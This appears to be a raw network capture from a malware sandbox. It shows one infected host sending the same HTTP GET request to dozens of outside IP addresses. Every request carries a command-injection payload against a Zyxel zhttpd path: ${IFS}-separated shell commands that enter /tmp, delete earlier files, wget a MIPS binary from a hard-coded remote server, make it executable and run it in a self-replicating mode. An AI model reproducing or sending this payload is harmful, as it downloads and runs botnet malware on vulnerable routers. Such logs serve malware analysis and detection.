                                      Jan 19, 2024 17:29:24.618242979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2574192.168.2.145874023.33.14.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618282080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2575192.168.2.1456634175.59.129.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618314028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2576192.168.2.145976240.220.41.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618347883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2577192.168.2.1450092133.78.129.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618406057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2578192.168.2.1451612101.112.235.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618443012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2579192.168.2.1459428132.99.153.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618472099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2580192.168.2.144871843.255.213.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618515968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2581192.168.2.1441228104.184.84.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618558884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2582192.168.2.14561322.7.120.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618587017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2583192.168.2.1457656188.214.153.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618618965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2584192.168.2.1437542223.113.168.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618680000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2585192.168.2.1454428104.5.97.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618719101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2586192.168.2.145714892.202.154.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618761063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2587192.168.2.1445256199.49.145.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618797064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2588192.168.2.1457164135.27.65.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618834972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2589192.168.2.145987097.138.209.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618877888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2590192.168.2.1433478113.234.183.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618896008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2591192.168.2.1437610142.213.215.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618942976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2592192.168.2.145576065.252.95.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618971109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2593192.168.2.1452912125.112.176.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619019985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2594192.168.2.1447860190.37.24.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619060040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2595192.168.2.1442830161.174.75.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619102001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2596192.168.2.1438380150.78.173.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619154930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2597192.168.2.1455400192.147.30.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619201899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2598192.168.2.1434048123.193.194.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619235992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2599192.168.2.145198665.178.195.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619271040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2600192.168.2.1458354207.2.83.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619303942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2601192.168.2.145158880.206.126.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619349003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2602192.168.2.1441968167.41.162.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619385958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2603192.168.2.1446268139.168.104.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619405985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2604192.168.2.1449342168.76.25.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619447947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2605192.168.2.144591220.70.232.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619466066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2606192.168.2.146017412.90.219.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619525909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2607192.168.2.144711094.135.183.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619555950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2608192.168.2.146031867.26.90.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619592905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2609192.168.2.1460576146.58.56.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619642019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2610192.168.2.143597653.177.119.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619671106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2611192.168.2.1438794162.196.171.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619801044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2612192.168.2.1457304117.101.179.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619843960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2613192.168.2.1453594209.172.45.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619893074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2614192.168.2.143682012.209.129.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619929075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2615192.168.2.145607061.190.195.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.619982958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2616192.168.2.144335479.216.108.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620003939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2617192.168.2.1435214105.240.211.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620037079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2618192.168.2.143773424.101.198.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620081902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2619192.168.2.144174034.211.184.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620102882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2620192.168.2.1441660209.39.52.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620168924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2621192.168.2.1443160217.38.5.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620199919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2622192.168.2.144741039.88.179.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620244980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2623192.168.2.145276614.95.45.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620269060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2624192.168.2.1456176109.207.40.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620311975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2625192.168.2.144062491.61.46.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620352030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2626192.168.2.1439754190.245.12.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620381117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2627192.168.2.1459880219.177.98.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620430946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2628192.168.2.1433474195.189.53.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620451927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2629192.168.2.1443432212.200.46.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620481014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2630192.168.2.143865639.67.4.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620517969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2631192.168.2.1440388124.162.51.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620558023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2632192.168.2.1440648103.19.131.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620583057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2633192.168.2.1435972110.192.198.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620609999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2634192.168.2.1456198141.116.47.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620651007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2635192.168.2.1453484162.128.178.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620698929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2636192.168.2.145186695.198.118.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620721102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2637192.168.2.145082676.179.6.165443
                                      TimestampBytes transferredDirectionData
